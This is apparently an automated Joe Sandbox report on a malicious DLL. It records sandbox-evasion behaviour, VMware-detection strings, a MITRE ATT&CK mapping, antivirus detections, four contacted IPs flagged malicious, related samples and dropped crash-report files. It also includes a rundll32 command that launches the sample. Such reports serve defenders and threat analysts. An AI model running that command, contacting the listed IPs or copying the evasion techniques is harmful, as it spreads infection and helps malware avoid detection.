Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1680

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1680

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA00730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

1_2_6EA00730

Source: Amcache.hve.14.dr	Binary or memory string: VMware
Source: Amcache.hve.14.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.14.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.14.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 0000000E.00000002.378850405.00000000053D9000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.378912915.0000000005402000.00000004.00000001.sdmp, WerFault.exe, 0000000E.00000002.378456295.00000000035E8000.00000004.00000020.sdmp, WerFault.exe, 0000000E.00000003.376896256.0000000005402000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.14.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.14.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.14.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.14.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E9F6D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6E9F6D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6EA03138 RtlAddVectoredExceptionHandler,

1_2_6EA03138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\hMUh2Mkqyi.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.808601203.00000000013C0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.363634450.0000000003980000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.360726990.0000000003980000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.357050923.0000000003380000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.355008368.0000000003380000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000001.00000002.808601203.00000000013C0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.363634450.0000000003980000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.360726990.0000000003980000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.357050923.0000000003380000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.355008368.0000000003380000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.808601203.00000000013C0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.363634450.0000000003980000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.360726990.0000000003980000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.357050923.0000000003380000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.355008368.0000000003380000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.808601203.00000000013C0000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.363634450.0000000003980000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.360726990.0000000003980000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.357050923.0000000003380000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.355008368.0000000003380000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

1_2_6E9F6D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

1_2_6E9F6D0C

Source: Amcache.hve.14.dr, Amcache.hve.LOG1.14.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr, Amcache.hve.LOG1.14.dr	Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	DLL Side-Loading1	Process Injection12	Virtualization/Sandbox Evasion1	OS Credential Dumping	Security Software Discovery21	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	DLL Side-Loading1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
hMUh2Mkqyi.dll	64%	Virustotal		Browse
hMUh2Mkqyi.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.loaddll32.exe.6e9f0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
1.2.loaddll32.exe.1000000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.rundll32.exe.3410000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.6e9f0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
5.0.rundll32.exe.c70000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.rundll32.exe.6e9f0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.2.rundll32.exe.3410000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.0.rundll32.exe.6e9f0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
5.2.rundll32.exe.c70000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.rundll32.exe.c70000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.rundll32.exe.6e9f0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.0.rundll32.exe.3410000.4.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.rundll32.exe.6e9f0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.14.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.33.132	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
104.36.167.47	unknown	United States	27640	GIGASNET-ASUS	true
217.160.5.104	unknown	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
188.40.48.93	unknown	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	545441
Start date:	26.12.2021
Start time:	17:08:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	hMUh2Mkqyi (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.evad.winDLL@9/10@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 95.3% (good quality ratio 93.4%) Quality average: 79.4% Quality standard deviation: 25%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 20.189.173.21 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
17:10:08	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
162.241.33.132	E972ciDmtE.dll	Get hash	malicious	Browse
	E972ciDmtE.dll	Get hash	malicious	Browse
	4NEHGDB2q7.dll	Get hash	malicious	Browse
	4NEHGDB2q7.dll	Get hash	malicious	Browse
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse
	UzgDinGRAz.dll	Get hash	malicious	Browse
	nr29dWSsgF.dll	Get hash	malicious	Browse
	UzgDinGRAz.dll	Get hash	malicious	Browse
	nr29dWSsgF.dll	Get hash	malicious	Browse
	OQjpM0PPCp.dll	Get hash	malicious	Browse
	zNMgAlNt7a.dll	Get hash	malicious	Browse
	OQjpM0PPCp.dll	Get hash	malicious	Browse
	zNMgAlNt7a.dll	Get hash	malicious	Browse
	VowAWbKvhX.dll	Get hash	malicious	Browse
	ZXD1iYQeIh.dll	Get hash	malicious	Browse
	LJj7wnqI9A.dll	Get hash	malicious	Browse
	VowAWbKvhX.dll	Get hash	malicious	Browse
	ZXD1iYQeIh.dll	Get hash	malicious	Browse
	LJj7wnqI9A.dll	Get hash	malicious	Browse
104.36.167.47	E972ciDmtE.dll	Get hash	malicious	Browse
	E972ciDmtE.dll	Get hash	malicious	Browse
	4NEHGDB2q7.dll	Get hash	malicious	Browse
	4NEHGDB2q7.dll	Get hash	malicious	Browse
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse
	UzgDinGRAz.dll	Get hash	malicious	Browse
	nr29dWSsgF.dll	Get hash	malicious	Browse
	UzgDinGRAz.dll	Get hash	malicious	Browse
	nr29dWSsgF.dll	Get hash	malicious	Browse
	OQjpM0PPCp.dll	Get hash	malicious	Browse
	zNMgAlNt7a.dll	Get hash	malicious	Browse
	OQjpM0PPCp.dll	Get hash	malicious	Browse
	zNMgAlNt7a.dll	Get hash	malicious	Browse
	VowAWbKvhX.dll	Get hash	malicious	Browse
	ZXD1iYQeIh.dll	Get hash	malicious	Browse
	LJj7wnqI9A.dll	Get hash	malicious	Browse
	VowAWbKvhX.dll	Get hash	malicious	Browse
	ZXD1iYQeIh.dll	Get hash	malicious	Browse
	LJj7wnqI9A.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	QmRD3TL34p	Get hash	malicious	Browse	98.131.204.234
	QiZ1RADVGt.xls	Get hash	malicious	Browse	192.185.6.31
	Aw8F7Ua3w7.xls	Get hash	malicious	Browse	192.185.6.31
	dSeuQsymrQ.exe	Get hash	malicious	Browse	216.172.160.230
	1WaWsMTrjt.exe	Get hash	malicious	Browse	216.172.160.230
	POWKlAddNj.exe	Get hash	malicious	Browse	216.172.160.230
	wJb8YRaQ9Y.xls	Get hash	malicious	Browse	192.185.6.31
	LcTYOSCFws.exe	Get hash	malicious	Browse	216.172.160.230
	8LuKQEfuX9.exe	Get hash	malicious	Browse	192.185.5.67
	MZf48VAxT7.exe	Get hash	malicious	Browse	216.172.160.230
	iOXn4DA38y.xls	Get hash	malicious	Browse	192.185.6.31
	wxSfUTFXM3.xls	Get hash	malicious	Browse	192.185.6.31
	GsWdBjZeXt.exe	Get hash	malicious	Browse	216.172.160.230
	HvM9U2PXj8	Get hash	malicious	Browse	76.163.41.198
	rAFAiRUA1V.dll	Get hash	malicious	Browse	162.214.50.39
	J25211072U.xls	Get hash	malicious	Browse	192.185.6.31
	P8350890482154705486T.xls	Get hash	malicious	Browse	192.185.6.31
	95638203769706269.xls	Get hash	malicious	Browse	192.185.6.31
	051245051373252633P.xls	Get hash	malicious	Browse	192.185.6.31
	963772118887626.xls	Get hash	malicious	Browse	192.185.6.31
GIGASNET-ASUS	E972ciDmtE.dll	Get hash	malicious	Browse	104.36.167.47
	E972ciDmtE.dll	Get hash	malicious	Browse	104.36.167.47
	4NEHGDB2q7.dll	Get hash	malicious	Browse	104.36.167.47
	4NEHGDB2q7.dll	Get hash	malicious	Browse	104.36.167.47
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse	104.36.167.47
	ReMxcvxKeOzodickpenis.dll	Get hash	malicious	Browse	104.36.167.47
	UzgDinGRAz.dll	Get hash	malicious	Browse	104.36.167.47
	nr29dWSsgF.dll	Get hash	malicious	Browse	104.36.167.47
	UzgDinGRAz.dll	Get hash	malicious	Browse	104.36.167.47
	nr29dWSsgF.dll	Get hash	malicious	Browse	104.36.167.47
	OQjpM0PPCp.dll	Get hash	malicious	Browse	104.36.167.47
	zNMgAlNt7a.dll	Get hash	malicious	Browse	104.36.167.47
	OQjpM0PPCp.dll	Get hash	malicious	Browse	104.36.167.47
	zNMgAlNt7a.dll	Get hash	malicious	Browse	104.36.167.47
	VowAWbKvhX.dll	Get hash	malicious	Browse	104.36.167.47
	ZXD1iYQeIh.dll	Get hash	malicious	Browse	104.36.167.47
	LJj7wnqI9A.dll	Get hash	malicious	Browse	104.36.167.47
	VowAWbKvhX.dll	Get hash	malicious	Browse	104.36.167.47
	ZXD1iYQeIh.dll	Get hash	malicious	Browse	104.36.167.47
	LJj7wnqI9A.dll	Get hash	malicious	Browse	104.36.167.47

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_38e29c13fccc57cc8ef8dd241186e366303ea06f_82810a17_1007ad0e\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9630478046159702
Encrypted:	false
SSDEEP:	192:3Haxi+0oXqCHBUZMX4jed+RU/u7shS274ItWc:X4iIXBBUZMX4jeH/u7shX4ItWc
MD5:	7FBE39425E264B9156D66CE3176F76F6
SHA1:	C01E617A68C7ABD87A9940DB152E4F369A57D39A
SHA-256:	358DA8D7561F9ACEC4C3803AA64FCD98A0FE1F73E695972A7B7A4ACA3E90F140
SHA-512:	2790121A764EF7A4B08828CA60762423CF0658D5E2BD93AF0862465330500E98FE4EE8DCB9BB2AB898BF86C45C3D536C5EB04006B369AD49549CFB3032A04C42
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.5.0.4.1.0.0.2.3.9.7.5.4.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.5.0.4.1.0.0.7.3.0.3.7.5.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.8.1.b.8.e.1.-.0.d.d.b.-.4.4.8.d.-.9.e.c.5.-.2.2.4.3.3.b.d.5.f.0.b.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.b.c.8.6.7.b.b.-.0.2.e.a.-.4.f.4.1.-.8.2.a.3.-.3.4.a.d.a.7.c.b.c.9.2.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.5.0.-.0.0.0.1.-.0.0.1.c.-.9.4.5.5.-.9.f.6.2.b.e.f.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_ea735312adf69f22b427e19aa51f4ce6a1d_82810a17_197343f4\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9999538488610752
Encrypted:	false
SSDEEP:	96:FCO6iTX0iLoycj95a2fRr/56tpXIQcQLc6Da+cEUcw39Lk/a/z+HbHg/BQAS/Yys:Cij0oXFHVzOMjed+x8/u7sGS274It7c
MD5:	6DE9E6BF4A269A9306E31BF789AE0A65
SHA1:	81B81C47AC341DBCAE3F634438C52AAB14771571
SHA-256:	2B4EAFD178BAABBD8386B12C6954960C9C4A84A53DD2A75B6A529707FD4615FC
SHA-512:	556D4A1F12CBC3B7821EE989B1D36BFEAFDEF19993D09C6E3697E736398695D37464E235D133AE1D071EBE802F91032F1B047FD0FBEC6F3EABA0BEC5D4F8AB68
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.5.0.4.1.0.0.6.1.4.9.8.6.4.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.2.7.b.c.c.3.-.9.6.f.f.-.4.6.f.0.-.b.e.1.6.-.9.8.5.d.3.1.2.8.2.f.1.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.b.5.8.2.a.c.5.-.6.9.c.e.-.4.c.f.0.-.9.5.8.9.-.e.3.5.e.0.1.8.7.4.5.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.4.-.0.0.0.1.-.0.0.1.c.-.f.1.f.8.-.9.b.6.2.b.e.f.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.u.n.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.8.6././.0.1././.3.0.:.1.1.:.4.2.:.4.4.!.1.0.3.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1ED8.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Mon Dec 27 01:10:04 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45526
Entropy (8bit):	2.15196836592883
Encrypted:	false
SSDEEP:	192:tCOC4qmBikzfY+fC0O5Skbtk4ynlR8Y//OTtPMMhcOkfxNCHE:3Nq5k8GC75Lbtk4ynoY//I5WOkfiE
MD5:	B00E79194B938632A0987A0A5154B522
SHA1:	B01238C808B24C44F4E928A168F94B429C37CC73
SHA-256:	DB83D671E9FE50F2E344CBB28FCC31FE81FAB9C36CEBCE1225A573A0FD80E51D
SHA-512:	63182BF9C6D1EE85F96FC539DF9B9CB937981392377D1CDF5A564D8B947A85A26E461FDABDF984CBB777C73ADF2DE169C4A68563298A42347EDF7977E8084385
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......l..a........................`................1..........T.......8...........T...........................................................................................................U...........B....... ......GenuineIntelW...........T.......P...C..a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER27E2.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8270
Entropy (8bit):	3.6910025519789134
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiRc6i6YAO6PzgmfTwDSzCprK89bRJsf0aG7m:RrlsNia6i6YB6PzgmfTUS4Rif0u
MD5:	1CB3E5A2E3E109A7A186956046169E8C
SHA1:	E91AE382E2B66681877CBEAE404FDBD092EC9738
SHA-256:	FAD59C371A1F3E622270BF0606257BF65EA328B9E16EDA93F07E17B1C7EB822A
SHA-512:	3EBE7EA76F1DD18733ED096182A453348671BBE8DF813B0ADBEB5704CF79AE196B0A10896F1AF6FF5660BF5E1F4DD5E35E2E34B8502F91B9756D89B65C336D7D
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AFF.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.461724081966551
Encrypted:	false
SSDEEP:	48:cvIwSD8zs57JgtWI9uoWSC8BZ8fm8M4JCdssBbDF+Sm+q8/NBfn1+T4SrSid:uITfrdBSNgJeOBO2TDWid
MD5:	4D5F964593FECB8FFA77238A6A4302DD
SHA1:	C302DA8844C7C5881FC9EADDC925E53D4B29EAE1
SHA-256:	F77225B5968753E97BC81E0ECC0D6E9C38D3A7A8886D2E98D5C2C63B916C0C04
